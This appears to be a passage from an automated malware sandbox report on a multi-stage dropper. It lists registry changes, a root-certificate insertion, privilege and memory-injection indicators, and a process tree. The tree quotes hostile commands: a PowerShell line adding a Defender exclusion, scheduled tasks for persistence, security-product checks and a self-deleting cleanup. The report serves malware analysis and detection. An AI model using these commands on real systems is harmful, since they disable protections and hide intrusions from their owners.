06b006300790062006500720065002e0072006b00720000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000002000000e6070200000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000ffffffff81ae2078e323294282c1e41cb67d5b9c00000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000 explorer.exe Set value (data) \REGISTRY\USER\S-1-5-21-1937337463-1541593363-3360944660-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\NodeSlots = 02 explorer.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\Deployment\Package\*\S-1-5-21-1937337463-1541593363-3360944660-1000\{16A4E79E-DE77-447C-8D55-D90153761828}\From = "0" svchost.exe Key created \REGISTRY\USER\S-1-5-21-1937337463-1541593363-3360944660-1000_Classes\CLSID\{018D5C66-4533-4307-9B53-224DE2ED1FE6}\Instance explorer.exe Key created \REGISTRY\USER\S-1-5-21-1937337463-1541593363-3360944660-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.cortana_cw5n1h2txyewy\Internet Explorer\DOMStorage\windows.cortana SearchUI.exe Key created \REGISTRY\USER\S-1-5-21-1937337463-1541593363-3360944660-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.cortana_cw5n1h2txyewy\Internet Explorer\DOMStorage\Total SearchUI.exe Set value (int) \REGISTRY\USER\S-1-5-21-1937337463-1541593363-3360944660-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.cortana_cw5n1h2txyewy\Internet Explorer\DOMStorage\windows.cortana\Total = "23" SearchUI.exe Set value (int) \REGISTRY\USER\S-1-5-21-1937337463-1541593363-3360944660-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\TrayNotify\UserStartTime = "132900993722986074" explorer.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\Deployment\Package\*\S-1-5-21-1937337463-1541593363-3360944660-1000\{16A4E79E-DE77-447C-8D55-D90153761828}\Count = "0" svchost.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{4336a54d-038b-4685-ab02-99bb52d3fb8b}\Instance explorer.exe Set value (int) \REGISTRY\USER\S-1-5-21-1937337463-1541593363-3360944660-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.cortana_cw5n1h2txyewy\Internet Explorer\DOMStorage\Total\ = "185" SearchUI.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\Deployment\Package\*\S-1-5-21-1937337463-1541593363-3360944660-1000\{16A4E79E-DE77-447C-8D55-D90153761828}\Version = "0" svchost.exe Key created \REGISTRY\USER\S-1-5-21-1937337463-1541593363-3360944660-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.cortana_cw5n1h2txyewy\Internet Explorer\DomStorageState SearchUI.exe Set value (str) \REGISTRY\USER\S-1-5-21-1937337463-1541593363-3360944660-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.cortana_cw5n1h2txyewy\Internet Settings\Cache\Content\CachePrefix SearchUI.exe Key created \REGISTRY\USER\S-1-5-21-1937337463-1541593363-3360944660-1000_Classes\Local Settings explorer.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{1f3427c8-5c10-4210-aa03-2ee45287d668}\Instance explorer.exe Set value (int) \REGISTRY\USER\S-1-5-21-1937337463-1541593363-3360944660-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.cortana_cw5n1h2txyewy\Internet Explorer\DOMStorage\microsoft.windows.cortana\ = "23" SearchUI.exe Key created \REGISTRY\USER\S-1-5-21-1937337463-1541593363-3360944660-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\windows.immersivecontrolpanel_cw5n1h2txyewy\SplashScreen -
Processes:
Tue029560e6534e190c.exedescription ioc process Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349 Tue029560e6534e190c.exe Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349\Blob = 5c0000000100000004000000000800000f00000001000000140000003e8e6487f8fd27d322a269a71edaac5d57811286090000000100000054000000305206082b0601050507030206082b06010505070303060a2b0601040182370a030406082b0601050507030406082b0601050507030606082b0601050507030706082b0601050507030106082b0601050507030853000000010000004300000030413022060c2b06010401b231010201050130123010060a2b0601040182373c0101030200c0301b060567810c010330123010060a2b0601040182373c0101030200c0620000000100000020000000d7a7a0fb5d7e2731d771e9484ebcdef71d5f0c3e0a2948782bc83ee0ea699ef40b000000010000001c0000005300650063007400690067006f002000280041004100410029000000140000000100000014000000a0110a233e96f107ece2af29ef82a57fd030a4b41d00000001000000100000002e0d6875874a44c820912e85e964cfdb030000000100000014000000d1eb23a46d17d68fd92564c2f1f1601764d8e3491900000001000000100000002aa1c05e2ae606f198c2c5e937c97aa2200000000100000036040000308204323082031aa003020102020101300d06092a864886f70d0101050500307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c18414141204365727469666963617465205365727669636573301e170d3034303130313030303030305a170d3238313233313233353935395a307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c1841414120436572746966696361746520536572766963657330820122300d06092a864886f70d01010105000382010f003082010a0282010100be409df46ee1ea76871c4d45448ebe46c883069dc12afe181f8ee402faf3ab5d508a16310b9a06d0c57022cd492d5463ccb66e68460b53eacb4c24c0bc724eeaf115aef4549a120ac37ab23360e2da8955f32258f3dedccfef8386a28c944f9f68f29890468427c776bfe3cc352c8b5e07646582c048b0a891f9619f762050a891c766b5eb78620356f08a1a13ea31a31ea099fd38f6f62732586f07f56bb8fb142bafb7aaccd6635f738cda0599a838a8cb17783651ace99ef4783a8dcf0fd942e2980cab2f9f0e01deef9f9949f12ddfac744d1b98b547c5e529d1f99018c7629cbe83c7267b3e8a25c7c0dd9de6356810209d8fd8ded2c3849c0d5ee82fc90203010001a381c03081bd301d0603551d0e04160414a0110a233e96f107ece2af29ef82a57fd030a4b4300e0603551d0f0101ff040403020106300f0603551d130101ff040530030101ff307b0603551d1f047430723038a036a0348632687474703a2f2f63726c2e636f6d6f646f63612e636f6d2f414141436572746966696361746553657276696365732e63726c3036a034a0328630687474703a2f2f63726c2e636f6d6f646f2e6e65742f414141436572746966696361746553657276696365732e63726c300d06092a864886f70d010105050003820101000856fc02f09be8ffa4fad67bc64480ce4fc4c5f60058cca6b6bc1449680476e8e6ee5dec020f60d68d50184f264e01e3e6b0a5eebfbc745441bffdfc12b8c74f5af48960057f60b7054af3f6f1c2bfc4b97486b62d7d6bccd2f346dd2fc6e06ac3c334032c7d96dd5ac20ea70a99c1058bab0c2ff35c3acf6c37550987de53406c58effcb6ab656e04f61bdc3ce05a15c69ed9f15948302165036cece92173ec9b03a1e037ada015188ffaba02cea72ca910132cd4e50826ab229760f8905e74d4a29a53bdf2a968e0a26ec2d76cb1a30f9ebfeb68e756f2aef2e32b383a0981b56b85d7be2ded3f1ab7b263e2f5622c82d46a004150f139839f95e93696986e Tue029560e6534e190c.exe -
Suspicious behavior: EnumeratesProcesses 64 IoCs
Processes:
Tue02522f9ea0b1.exepowershell.exepid process 384 Tue02522f9ea0b1.exe 384 Tue02522f9ea0b1.exe 760 powershell.exe 760 powershell.exe 2360 2360 2360 2360 2360 2360 2360 2360 2360 2360 2360 2360 2360 2360 760 powershell.exe 2360 2360 2360 2360 2360 2360 2360 2360 2360 2360 2360 2360 2360 2360 2360 2360 2360 2360 2360 2360 2360 2360 2360 2360 2360 2360 2360 2360 2360 2360 2360 2360 2360 2360 2360 2360 2360 2360 2360 2360 2360 2360 2360 2360 2360 -
Suspicious behavior: GetForegroundWindowSpam 4 IoCs
Processes:
Tue026e182673.exeexplorer.exetaskmgr.exepid process 2360 2880 Tue026e182673.exe 2096 explorer.exe 4224 taskmgr.exe -
Suspicious behavior: MapViewOfSection 12 IoCs
Processes:
Tue02522f9ea0b1.exeRkeagtomax1.exeirhsfcsexplorer.exeirhsfcspid process 384 Tue02522f9ea0b1.exe 4108 Rkeagtomax1.exe 2360 2360 2360 2360 5784 irhsfcs 2096 explorer.exe 2096 explorer.exe 2096 explorer.exe 2096 explorer.exe 5076 irhsfcs -
Suspicious use of AdjustPrivilegeToken 64 IoCs
Processes:
Tue02dc626f48.exeTue02976fcdf1.exeTue02705f9c2b455.exepowershell.exetaskkill.exedescription pid process Token: SeCreateTokenPrivilege 996 Tue02dc626f48.exe Token: SeAssignPrimaryTokenPrivilege 996 Tue02dc626f48.exe Token: SeLockMemoryPrivilege 996 Tue02dc626f48.exe Token: SeIncreaseQuotaPrivilege 996 Tue02dc626f48.exe Token: SeMachineAccountPrivilege 996 Tue02dc626f48.exe Token: SeTcbPrivilege 996 Tue02dc626f48.exe Token: SeSecurityPrivilege 996 Tue02dc626f48.exe Token: SeTakeOwnershipPrivilege 996 Tue02dc626f48.exe Token: SeLoadDriverPrivilege 996 Tue02dc626f48.exe Token: SeSystemProfilePrivilege 996 Tue02dc626f48.exe Token: SeSystemtimePrivilege 996 Tue02dc626f48.exe Token: SeProfSingleProcessPrivilege 996 Tue02dc626f48.exe Token: SeIncBasePriorityPrivilege 996 Tue02dc626f48.exe Token: SeCreatePagefilePrivilege 996 Tue02dc626f48.exe Token: SeCreatePermanentPrivilege 996 Tue02dc626f48.exe Token: SeBackupPrivilege 996 Tue02dc626f48.exe Token: SeRestorePrivilege 996 Tue02dc626f48.exe Token: SeShutdownPrivilege 996 Tue02dc626f48.exe Token: SeDebugPrivilege 996 Tue02dc626f48.exe Token: SeAuditPrivilege 996 Tue02dc626f48.exe Token: SeSystemEnvironmentPrivilege 996 Tue02dc626f48.exe Token: SeChangeNotifyPrivilege 996 Tue02dc626f48.exe Token: SeRemoteShutdownPrivilege 996 Tue02dc626f48.exe Token: SeUndockPrivilege 996 Tue02dc626f48.exe Token: SeSyncAgentPrivilege 996 Tue02dc626f48.exe Token: SeEnableDelegationPrivilege 996 Tue02dc626f48.exe Token: SeManageVolumePrivilege 996 Tue02dc626f48.exe Token: SeImpersonatePrivilege 996 Tue02dc626f48.exe Token: SeCreateGlobalPrivilege 996 Tue02dc626f48.exe Token: 31 996 Tue02dc626f48.exe Token: 32 996 Tue02dc626f48.exe Token: 33 996 Tue02dc626f48.exe Token: 34 996 Tue02dc626f48.exe Token: 35 996 Tue02dc626f48.exe Token: SeDebugPrivilege 3772 Tue02976fcdf1.exe Token: SeDebugPrivilege 3724 Tue02705f9c2b455.exe Token: SeDebugPrivilege 760 powershell.exe Token: SeDebugPrivilege 720 taskkill.exe Token: SeShutdownPrivilege 2360 Token: SeCreatePagefilePrivilege 2360 Token: SeShutdownPrivilege 2360 Token: SeCreatePagefilePrivilege 2360 Token: SeShutdownPrivilege 2360 Token: SeCreatePagefilePrivilege 2360 Token: SeShutdownPrivilege 2360 Token: SeCreatePagefilePrivilege 2360 Token: SeShutdownPrivilege 2360 Token: SeCreatePagefilePrivilege 2360 Token: SeShutdownPrivilege 2360 Token: SeCreatePagefilePrivilege 2360 Token: SeShutdownPrivilege 2360 Token: SeCreatePagefilePrivilege 2360 Token: SeShutdownPrivilege 2360 Token: SeCreatePagefilePrivilege 2360 Token: SeShutdownPrivilege 2360 Token: SeCreatePagefilePrivilege 2360 Token: SeShutdownPrivilege 2360 Token: SeCreatePagefilePrivilege 2360 Token: SeShutdownPrivilege 2360 Token: SeCreatePagefilePrivilege 2360 Token: SeShutdownPrivilege 2360 Token: SeCreatePagefilePrivilege 2360 Token: SeShutdownPrivilege 2360 Token: SeCreatePagefilePrivilege 2360 -
Suspicious use of FindShellTrayWindow 64 IoCs
Processes:
taskmgr.exeSta.exe.pifexplorer.exepid process 2360 4224 taskmgr.exe 4224 taskmgr.exe 4224 taskmgr.exe 4224 taskmgr.exe 4224 taskmgr.exe 4224 taskmgr.exe 4224 taskmgr.exe 4224 taskmgr.exe 4224 taskmgr.exe 4224 taskmgr.exe 4224 taskmgr.exe 4224 taskmgr.exe 4224 taskmgr.exe 2360 2360 4224 taskmgr.exe 4224 taskmgr.exe 4224 taskmgr.exe 4224 taskmgr.exe 4224 taskmgr.exe 4224 taskmgr.exe 4224 taskmgr.exe 4224 taskmgr.exe 4224 taskmgr.exe 4224 taskmgr.exe 4224 taskmgr.exe 4224 taskmgr.exe 4224 taskmgr.exe 4224 taskmgr.exe 2360 2360 5240 Sta.exe.pif 5240 Sta.exe.pif 5240 Sta.exe.pif 5240 Sta.exe.pif 2096 explorer.exe 2096 explorer.exe 2096 explorer.exe 2096 explorer.exe 2096 explorer.exe 2096 explorer.exe 2096 explorer.exe 2096 explorer.exe 2096 explorer.exe 2096 explorer.exe 2096 explorer.exe 2096 explorer.exe 2096 explorer.exe 2096 explorer.exe 2096 explorer.exe 2096 explorer.exe 2096 explorer.exe 2096 explorer.exe 2096 explorer.exe 2096 explorer.exe 2096 explorer.exe 2096 explorer.exe 2096 explorer.exe 2096 explorer.exe 2096 explorer.exe 2096 explorer.exe 2096 explorer.exe 2096 explorer.exe -
Suspicious use of SendNotifyMessage 64 IoCs
Processes:
taskmgr.exepid process 2360 2360 2360 2360 2360 2360 2360 2360 2360 2360 2360 2360 2360 2360 2360 2360 2360 2360 2360 2360 2360 2360 2360 2360 2360 2360 2360 2360 2360 2360 2360 2360 2360 2360 2360 2360 2360 2360 2360 2360 2360 2360 2360 2360 2360 2360 2360 2360 2360 2360 2360 2360 2360 2360 2360 2360 2360 2360 4224 taskmgr.exe 4224 taskmgr.exe 4224 taskmgr.exe 4224 taskmgr.exe 4224 taskmgr.exe 4224 taskmgr.exe -
Suspicious use of SetWindowsHookEx 6 IoCs
Processes:
SystemSettings.exeShellExperienceHost.exeSearchUI.exepid process 2360 4300 SystemSettings.exe 4240 ShellExperienceHost.exe 4240 ShellExperienceHost.exe 3932 SearchUI.exe 4240 ShellExperienceHost.exe -
Suspicious use of WriteProcessMemory 64 IoCs
Processes:
setup_x86_x64_install.exesetup_installer.exesetup_install.execmd.execmd.execmd.execmd.execmd.execmd.execmd.execmd.exedescription pid process target process PID 3880 wrote to memory of 2784 3880 setup_x86_x64_install.exe setup_installer.exe PID 3880 wrote to memory of 2784 3880 setup_x86_x64_install.exe setup_installer.exe PID 3880 wrote to memory of 2784 3880 setup_x86_x64_install.exe setup_installer.exe PID 2784 wrote to memory of 4056 2784 setup_installer.exe setup_install.exe PID 2784 wrote to memory of 4056 2784 setup_installer.exe setup_install.exe PID 2784 wrote to memory of 4056 2784 setup_installer.exe setup_install.exe PID 4056 wrote to memory of 1480 4056 setup_install.exe cmd.exe PID 4056 wrote to memory of 1480 4056 setup_install.exe cmd.exe PID 4056 wrote to memory of 1480 4056 setup_install.exe cmd.exe PID 4056 wrote to memory of 3024 4056 setup_install.exe cmd.exe PID 4056 wrote to memory of 3024 4056 setup_install.exe cmd.exe PID 4056 wrote to memory of 3024 4056 setup_install.exe cmd.exe PID 4056 wrote to memory of 3028 4056 setup_install.exe cmd.exe PID 4056 wrote to memory of 3028 4056 setup_install.exe cmd.exe PID 4056 wrote to memory of 3028 4056 setup_install.exe cmd.exe PID 4056 wrote to memory of 2408 4056 setup_install.exe cmd.exe PID 4056 wrote to memory of 2408 4056 setup_install.exe cmd.exe PID 4056 wrote to memory of 2408 4056 setup_install.exe cmd.exe PID 4056 wrote to memory of 3672 4056 setup_install.exe cmd.exe PID 4056 wrote to memory of 3672 4056 setup_install.exe cmd.exe PID 4056 wrote to memory of 3672 4056 setup_install.exe cmd.exe PID 4056 wrote to memory of 3604 4056 setup_install.exe cmd.exe PID 4056 wrote to memory of 3604 4056 setup_install.exe cmd.exe PID 4056 wrote to memory of 3604 4056 setup_install.exe cmd.exe PID 4056 wrote to memory of 3576 4056 setup_install.exe cmd.exe PID 4056 wrote to memory of 3576 4056 setup_install.exe cmd.exe PID 4056 wrote to memory of 3576 4056 setup_install.exe cmd.exe PID 4056 wrote to memory of 3688 4056 setup_install.exe cmd.exe PID 4056 wrote to memory of 3688 4056 setup_install.exe cmd.exe PID 4056 wrote to memory of 3688 4056 setup_install.exe cmd.exe PID 4056 wrote to memory of 2108 4056 setup_install.exe cmd.exe PID 4056 wrote to memory of 2108 4056 setup_install.exe cmd.exe PID 4056 wrote to memory of 2108 4056 setup_install.exe cmd.exe PID 4056 wrote to memory of 3036 4056 setup_install.exe cmd.exe PID 4056 wrote to memory of 3036 4056 setup_install.exe cmd.exe PID 4056 wrote to memory of 3036 4056 setup_install.exe cmd.exe PID 4056 wrote to memory of 3512 4056 setup_install.exe cmd.exe PID 4056 wrote to memory of 3512 4056 setup_install.exe cmd.exe PID 4056 wrote to memory of 3512 4056 setup_install.exe cmd.exe PID 4056 wrote to memory of 3684 4056 setup_install.exe cmd.exe PID 4056 wrote to memory of 3684 4056 setup_install.exe cmd.exe PID 4056 wrote to memory of 3684 4056 setup_install.exe cmd.exe PID 3576 wrote to memory of 608 3576 cmd.exe Tue026e94a5005f8.exe PID 3576 wrote to memory of 608 3576 cmd.exe Tue026e94a5005f8.exe PID 3576 wrote to memory of 608 3576 cmd.exe Tue026e94a5005f8.exe PID 3512 wrote to memory of 672 3512 cmd.exe Tue029560e6534e190c.exe PID 3512 wrote to memory of 672 3512 cmd.exe Tue029560e6534e190c.exe PID 3512 wrote to memory of 672 3512 cmd.exe Tue029560e6534e190c.exe PID 3604 wrote to memory of 996 3604 cmd.exe Tue02dc626f48.exe PID 3604 wrote to memory of 996 3604 cmd.exe Tue02dc626f48.exe PID 3604 wrote to memory of 996 3604 cmd.exe Tue02dc626f48.exe PID 3024 wrote to memory of 384 3024 cmd.exe Tue02522f9ea0b1.exe PID 3024 wrote to memory of 384 3024 cmd.exe Tue02522f9ea0b1.exe PID 3024 wrote to memory of 384 3024 cmd.exe Tue02522f9ea0b1.exe PID 3028 wrote to memory of 1180 3028 cmd.exe Tue028a363eda.exe PID 3028 wrote to memory of 1180 3028 cmd.exe Tue028a363eda.exe PID 3028 wrote to memory of 1180 3028 cmd.exe Tue028a363eda.exe PID 2108 wrote to memory of 1960 2108 cmd.exe Tue02b2110095fe706.exe PID 2108 wrote to memory of 1960 2108 cmd.exe Tue02b2110095fe706.exe PID 2108 wrote to memory of 1960 2108 cmd.exe Tue02b2110095fe706.exe PID 3036 wrote to memory of 2880 3036 cmd.exe Tue026e182673.exe PID 3036 wrote to memory of 2880 3036 cmd.exe Tue026e182673.exe PID 3036 wrote to memory of 2880 3036 cmd.exe Tue026e182673.exe PID 3672 wrote to memory of 3424 3672 cmd.exe Tue02520f255d0ba43a.exe -
outlook_office_path 1 IoCs
Processes:
explorer.exedescription ioc process Key opened \REGISTRY\USER\S-1-5-21-1937337463-1541593363-3360944660-1000\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 explorer.exe -
outlook_win_path 1 IoCs
Processes:
explorer.exedescription ioc process Key opened \REGISTRY\USER\S-1-5-21-1937337463-1541593363-3360944660-1000\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 explorer.exe
Processes
-
C:\Users\Admin\AppData\Local\Temp\setup_x86_x64_install.exe"C:\Users\Admin\AppData\Local\Temp\setup_x86_x64_install.exe"1⤵
- Suspicious use of WriteProcessMemory
-
C:\Users\Admin\AppData\Local\Temp\setup_installer.exe"C:\Users\Admin\AppData\Local\Temp\setup_installer.exe"2⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
-
C:\Users\Admin\AppData\Local\Temp\7zS0EA7B97D\setup_install.exe"C:\Users\Admin\AppData\Local\Temp\7zS0EA7B97D\setup_install.exe"3⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Local\Temp"4⤵
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Local\Temp"5⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Tue02520f255d0ba43a.exe4⤵
- Suspicious use of WriteProcessMemory
-
C:\Users\Admin\AppData\Local\Temp\7zS0EA7B97D\Tue02520f255d0ba43a.exeTue02520f255d0ba43a.exe5⤵
- Executes dropped EXE
- Checks computer location settings
-
C:\Users\Admin\Pictures\Adobe Films\C_6Vh88t0LaZcKPANlvk2QsC.exe"C:\Users\Admin\Pictures\Adobe Films\C_6Vh88t0LaZcKPANlvk2QsC.exe"6⤵
- Executes dropped EXE
-
C:\Users\Admin\Pictures\Adobe Films\PSCakx_1GqG6H8j49kLJjf_H.exe"C:\Users\Admin\Pictures\Adobe Films\PSCakx_1GqG6H8j49kLJjf_H.exe"6⤵
- Executes dropped EXE
-
C:\Users\Admin\Pictures\Adobe Films\l9zT5gMhbrL80GwRZ9UBShd6.exe"C:\Users\Admin\Pictures\Adobe Films\l9zT5gMhbrL80GwRZ9UBShd6.exe"6⤵
- Executes dropped EXE
- Drops file in Program Files directory
-
C:\Windows\SysWOW64\schtasks.exeschtasks /create /f /RU "Admin" /tr "C:\Program Files (x86)\PowerControl\PowerControl_Svc.exe" /tn "PowerControl LG" /sc ONLOGON /rl HIGHEST7⤵
- Creates scheduled task(s)
-
C:\Windows\SysWOW64\schtasks.exeschtasks /create /f /RU "Admin" /tr "C:\Program Files (x86)\PowerControl\PowerControl_Svc.exe" /tn "PowerControl HR" /sc HOURLY /rl HIGHEST7⤵
- Creates scheduled task(s)
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV18⤵
- Executes dropped EXE
-
C:\Users\Admin\Documents\STY8hL6xDlOSsr4U3ZdGscfw.exe"C:\Users\Admin\Documents\STY8hL6xDlOSsr4U3ZdGscfw.exe"7⤵
- Executes dropped EXE
-
C:\Users\Admin\Pictures\Adobe Films\Gr4SP6wxzr4cmONkSIJAPieO.exe"C:\Users\Admin\Pictures\Adobe Films\Gr4SP6wxzr4cmONkSIJAPieO.exe"6⤵
- Executes dropped EXE
- Checks whether UAC is enabled
-
C:\Windows\SysWOW64\svchost.exe"C:\Windows\System32\svchost.exe"7⤵
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c cmd < Detto.xla7⤵
-
C:\Windows\SysWOW64\cmd.execmd8⤵
-
C:\Windows\SysWOW64\tasklist.exetasklist /FI "imagename eq BullGuardCore.exe"9⤵
- Enumerates processes with tasklist
-
C:\Windows\SysWOW64\find.exefind /I /N "bullguardcore.exe"9⤵
-
C:\Windows\SysWOW64\tasklist.exetasklist /FI "imagename eq PSUAService.exe"9⤵
- Enumerates processes with tasklist
-
C:\Windows\SysWOW64\find.exefind /I /N "psuaservice.exe"9⤵
-
C:\Windows\SysWOW64\findstr.exefindstr /V /R "^wtwRMqjYMlcblhfrOaJNpOohYASICCRoGRaYHSofIqwzkvtDhVASceYjWNSjoDvlzhRaVdvWpzypNPwCvgcGwZMDTye$" Hai.xla9⤵
-
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Sta.exe.pifSta.exe.pif V9⤵
- Executes dropped EXE
- Suspicious use of FindShellTrayWindow
-
C:\Windows\SysWOW64\waitfor.exewaitfor /t 5 MsGxuGavEVaQbserVWhrA9⤵
-
C:\Users\Admin\Pictures\Adobe Films\XJ0fkTUF_30pQ1pVSKd3oMyu.exe"C:\Users\Admin\Pictures\Adobe Films\XJ0fkTUF_30pQ1pVSKd3oMyu.exe"6⤵
- Executes dropped EXE
-
C:\Users\Admin\Pictures\Adobe Films\6QulEKJrycYYo69tD2ahPE3n.exe"C:\Users\Admin\Pictures\Adobe Films\6QulEKJrycYYo69tD2ahPE3n.exe"6⤵
- Executes dropped EXE
-
C:\Users\Admin\Pictures\Adobe Films\KM1GP8eBX6tE73klGEMH4jeJ.exe"C:\Users\Admin\Pictures\Adobe Films\KM1GP8eBX6tE73klGEMH4jeJ.exe"6⤵
- Executes dropped EXE
-
C:\Users\Admin\Pictures\Adobe Films\Wydn3mlENByJVR0hON7G5aEk.exe"C:\Users\Admin\Pictures\Adobe Films\Wydn3mlENByJVR0hON7G5aEk.exe"6⤵
- Executes dropped EXE
- Suspicious use of NtSetInformationThreadHideFromDebugger
-
C:\Users\Admin\Pictures\Adobe Films\teJ9sS7uHYXx1OcqqRMSjW7B.exe"C:\Users\Admin\Pictures\Adobe Films\teJ9sS7uHYXx1OcqqRMSjW7B.exe"6⤵
- Executes dropped EXE
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 540 -s 4207⤵
- Program crash
-
C:\Users\Admin\Pictures\Adobe Films\YXeE4i59D2lxgKdXKkqS0Fxk.exe"C:\Users\Admin\Pictures\Adobe Films\YXeE4i59D2lxgKdXKkqS0Fxk.exe"6⤵
- Executes dropped EXE
- Loads dropped DLL
- Checks processor information in registry
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c taskkill /im YXeE4i59D2lxgKdXKkqS0Fxk.exe /f & timeout /t 6 & del /f /q "C:\Users\Admin\Pictures\Adobe Films\YXeE4i59D2lxgKdXKkqS0Fxk.exe" & del C:\ProgramData\*.dll & exit7⤵
-
C:\Windows\SysWOW64\taskkill.exetaskkill /im YXeE4i59D2lxgKdXKkqS0Fxk.exe /f8⤵
- Kills process with taskkill
-
C:\Windows\SysWOW64\timeout.exetimeout /t 68⤵
- Delays execution with timeout.exe
-
C:\Users\Admin\Pictures\Adobe Films\1gVwz1kmsntO2R5yrGr_FczL.exe"C:\Users\Admin\Pictures\Adobe Films\1gVwz1kmsntO2R5yrGr_FczL.exe"6⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
-
C:\Users\Admin\Pictures\Adobe Films\1gVwz1kmsntO2R5yrGr_FczL.exe"C:\Users\Admin\Pictures\Adobe Films\1gVwz1kmsntO2R5yrGr_FczL.exe"7⤵
- Executes dropped EXE
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 4384 -s 5328⤵
- Program crash
-
C:\Users\Admin\Pictures\Adobe Films\FmI4giCCPSrfnMxkXeAZH6dK.exe"C:\Users\Admin\Pictures\Adobe Films\FmI4giCCPSrfnMxkXeAZH6dK.exe"6⤵
- Executes dropped EXE
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 532 -s 6607⤵
- Program crash
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 532 -s 6767⤵
- Program crash
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 532 -s 6807⤵
- Program crash
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 532 -s 6847⤵
- Program crash
-
